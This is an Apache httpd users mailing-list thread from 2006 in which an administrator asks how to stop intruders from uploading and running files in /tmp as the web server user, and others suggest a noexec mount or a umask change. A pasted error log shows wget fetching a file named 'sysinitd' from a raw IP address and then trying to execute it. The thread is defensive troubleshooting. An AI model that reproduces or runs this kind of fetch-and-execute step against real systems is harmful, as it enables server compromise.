You are viewing a plain text version of this content. The canonical link for it is here.

Posted to users@httpd.apache.org by Georgy Goshin <go...@inbox.ee> on 2006/06/02 10:44:31 UTC

[users@httpd] how to prevent an executing from /tmp

Hi!

Someone often uploads files to /tmp and then executing in on the server with 
webserver user priveleges. How to prevent it?



Thanks,
G. 


---------------------------------------------------------------------
The official User-To-User support forum of the Apache HTTP Server Project.
See <URL:http://httpd.apache.org/userslist.html> for more info.
To unsubscribe, e-mail: users-unsubscribe@httpd.apache.org
   "   from the digest: users-digest-unsubscribe@httpd.apache.org
For additional commands, e-mail: users-help@httpd.apache.org

Re: [users@httpd] how to prevent an executing from /tmp

Posted by Gaël Lams <la...@gmail.com>.

> Someone often uploads files to /tmp and then executing in on the server with
> webserver user priveleges. How to prevent it?

I personnaly always put /tmp on its own partition and mount it with
the noexec option.

Regards,

Gaël

Re: [users@httpd] how to prevent an executing from /tmp

Posted by Georgy Goshin <go...@inbox.ee>.

Immidiatley after restart someone donwloads to /tmp file sysinitrd, how do I 
know wich virtualhost do this?


[Sat Jun 03 13:30:25 2006] [notice] LDAP: Built with OpenLDAP LDAP SDK
[Sat Jun 03 13:30:25 2006] [notice] LDAP: SSL support unavailable
[Sat Jun 03 13:30:25 2006] [notice] suEXEC mechanism enabled (wrapper: 
/usr/sbin/suexec)
[Sat Jun 03 13:30:26 2006] [notice] Digest: generating secret for digest 
authentication ...
[Sat Jun 03 13:30:26 2006] [notice] Digest: done
[Sat Jun 03 13:30:26 2006] [notice] LDAP: Built with OpenLDAP LDAP SDK
[Sat Jun 03 13:30:26 2006] [notice] LDAP: SSL support unavailable
[Sat Jun 03 13:30:26 2006] [notice] mod_python: Creating 32 session mutexes 
based on 512 max processes and 0 max threads.
[Sat Jun 03 13:30:27 2006] [notice] Apache/2.0.51 (Fedora) mod_perl/1.99_12 
Perl/v5.8.3 DAV/2 PHP/4.3.11 mod_python/3.1.3 Python/2.3.3 mod_ssl/2.0.51 
OpenSSL/0.9.7a configu
red -- resuming normal operations
--13:30:39--  http://212.78.204.20/turbo3000/sysinitd
           => `sysinitd'
Connecting to 212.78.204.20:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 31,973 [text/plain]

    0K .......... .......... .......... .                    100%  343.06 
KB/s

13:30:39 (343.06 KB/s) - `sysinitd' saved [31,973/31,973]

sh: line 1: ./sysinitd: Permission denied
--13:30:53--  http://212.78.204.20/turbo3000/sysinitd
           => `sysinitd.1'
Connecting to 212.78.204.20:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 31,973 [text/plain]

    0K .......... .......... .......... .                    100%  278.19 
KB/s

13:30:53 (278.19 KB/s) - `sysinitd.1' saved [31,973/31,973]

sh: line 1: ./sysinitd: Permission denied




And I often find a processes with name '-bash' and uid 'apache' - how to 
disallow this?


I remounted /tmp and /home with noexec,nosuid.


Thanks,
G.

----- Original Message ----- 
From: "JP" <jp...@tulane.edu>
To: <us...@httpd.apache.org>
Sent: Friday, June 02, 2006 5:23 PM
Subject: RE: [users@httpd] how to prevent an executing from /tmp


>>
>> Someone often uploads files to /tmp and then executing in on the server
>> with
>> webserver user priveleges. How to prevent it?
>>
>
> How about changing the umask of the webuser?
>
> JP
>
>
> ---------------------------------------------------------------------
> The official User-To-User support forum of the Apache HTTP Server Project.
> See <URL:http://httpd.apache.org/userslist.html> for more info.
> To unsubscribe, e-mail: users-unsubscribe@httpd.apache.org
>   "   from the digest: users-digest-unsubscribe@httpd.apache.org
> For additional commands, e-mail: users-help@httpd.apache.org
>
> 


---------------------------------------------------------------------
The official User-To-User support forum of the Apache HTTP Server Project.
See <URL:http://httpd.apache.org/userslist.html> for more info.
To unsubscribe, e-mail: users-unsubscribe@httpd.apache.org
   "   from the digest: users-digest-unsubscribe@httpd.apache.org
For additional commands, e-mail: users-help@httpd.apache.org

RE: [users@httpd] how to prevent an executing from /tmp

Posted by JP <jp...@tulane.edu>.

> 
> Someone often uploads files to /tmp and then executing in on the server
> with
> webserver user priveleges. How to prevent it?
> 

How about changing the umask of the webuser?

JP


---------------------------------------------------------------------
The official User-To-User support forum of the Apache HTTP Server Project.
See <URL:http://httpd.apache.org/userslist.html> for more info.
To unsubscribe, e-mail: users-unsubscribe@httpd.apache.org
   "   from the digest: users-digest-unsubscribe@httpd.apache.org
For additional commands, e-mail: users-help@httpd.apache.org